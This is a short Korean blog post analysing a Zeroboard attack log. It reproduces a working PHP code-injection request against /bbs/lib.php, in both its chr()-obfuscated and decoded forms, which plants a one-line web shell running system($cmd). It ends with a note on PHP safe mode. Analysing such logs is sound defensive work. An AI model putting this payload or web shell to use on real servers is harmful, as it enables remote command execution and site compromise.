applicationlayer

얼마전에 발견한 제로보드공격로그입니다.

PoC를 그대로 썼네요
http://www.milw0rm.com/exploits/9590

/bbs/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=

알기쉽게 풀어보면=>

/bbs/lib.php?REMOTE_ADDR=*/fputs(fopen(./shell.php,w+),웹쉘내용);/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=

생성된 파일입니다
=====shell.php========
<? system($cmd); ?>

PHP는 현재 스크립트의 소유자(owner)가 파일 함수에 의해 제어되는 파일의 소유자(owner)나 그 디렉토리와 일치하는지 검사한다.
http://php.net/manual/kr/ini.sect.safe-mode.php

ㅇㅇ